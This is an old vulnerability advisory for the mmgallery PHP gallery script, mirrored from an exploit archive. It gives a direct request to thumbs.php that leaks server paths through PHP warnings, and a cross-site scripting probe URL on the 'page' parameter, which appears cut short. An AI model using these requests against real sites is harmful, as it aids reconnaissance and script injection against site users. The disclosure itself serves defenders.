Lucene search
mmgallery.txt
🗓️ 27 Nov 2006 00:00:00Reported by Al7ejaz HackerType 
packetstorm🔗 packetstormsecurity.com👁 22 Views
mmgallery Multiple vulnerabilities. FullPath disclosure and Cross site Scripting in mmgallery scrip
Show more
`+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+ ;;ii,,:: +
+ :::: :: ;;tt;;:: +
+ ;;:: ..,,:: ;;ii,,:: +
+ ,,,, ii;;,, ii;;:: ;;ii,,:: +
+ ii:: tt;;,, ..tt;;,,.. ;;ii;;:: +
+ ii,,:: ttii,, ..ff;;;;:: ;;ii;;:: +
+ tt;;::..,, tt;;,, ff;;;;ii ;;ii,,:: +
+ tt;;::;;:: tt;;,,.. jj;;,,.. ;;tt,,:: +
+ tt;;;;,, tt;;,,.. tt;;;; ;;ii;;:: +
+ ..::,,;;,, tt;;,,.. tt;;,, ;;ii,,:: +
+ ..::,,ii;;;;.. tt;;,,.. iiii,,:: ;;ii,,:: +
+ ::,,ttiijj;;,, tt;;;;.. ;;tt,,:: ;;ii,,:: +
+ ,,;;ii tt;;,, ii;;,,.. ..jj;;:: ;;ii;;:: +
+ ;;;;:: tt;;:: tt;;;;.. ff;;:: ;;tt,,.. +
+ ii;;.. ,,ii;;:: ii;;,,.. jj;;,, ;;ii,,.. +
+ ,,;;,, ::;;;;;;:: ii;;;;.. tt;;,, ;;ii;;.. +
+ tt;;:::: ::,,;;jj,,:: tt;;,,.. tt;;,, ;;ii,,.. +
+ jj;;;;,,,,,,iiiiii;;:: ..tt;;,,:: iiii,, ;;ii,,.. +
+ ;;ffjjttjjttii ii;;:: ii;;;;;;:: ..jj,, ;;ii;;.. +
+ ..;;.. ii;;,,:: ,,;;;;jj;;,, ..jj,, ;;ii,,.. +
+ iiii;;,,::::....::,,,,;;,,jj;;;;,,:: ::,,;;,, ;;ii;; +
+ ..ff;;;;;;,,,,::,,;;;;;; ttii;;;;,,,,,,,,;;;;:: ;;ii,, +
+ jjii;;;;;;;;;;;;;;ii.. ..ff;;;;;;;;;;;;;;;; ;;ii,, +
+ jjjj;;;;ii;;;;tt.. iijj;;;;;;;;;;ii:: ;;ii:: +
+ iijjjjjjtt;; ;;ffffjjjjtt:: ;;ii +
+ ;;.. ii;; +
+ .. +
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+ +
Credit by : Al7ejaz HackerZ
mmgallery Multiple vulnerabilities
Script : mmgallery
Website: mmgallery.net
Impact : FullPath disclosure and Cross site Scripting
FullPath disclosure in thumbs.php
*********************************
when thumbs.php file is called directelly withowth argument this cause fullpath disclosure
http://localhost/thumbs.php
Result
------------------------------------------------------------------------
Warning: readdir(): supplied argument is not a valid Directory resource in /var/www/photos/functions.inc on line 46
Warning: closedir(): supplied argument is not a valid Directory resource in /var/www/user/functions.inc on line 58
Galery :: Title ::
Warning: opendir(.//thumbs) [function.opendir]: failed to open dir: No such file or directory in /var/www/user/functions.inc on line 99
Warning: readdir(): supplied argument is not a valid Directory resource in /var/www/user/functions.inc on line 101
Warning: sort() expects parameter 1 to be array, null given in /var/www/user/functions.inc on line 112
Warning: closedir(): supplied argument is not a valid Directory resource in /var/www/user/functions.inc on line 113
--------------------------------------------
Cross Site Scripting
************************
page varibale is not proprely verified and can be used to execute arbitary htmlcode
http://localhost/thumbs.php?page='>
Al7ejaz HackerZ ;)
/Milw0rm
`
Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo27 Nov 2006 00:00Current
7.4High risk
Vulners AI Score7.4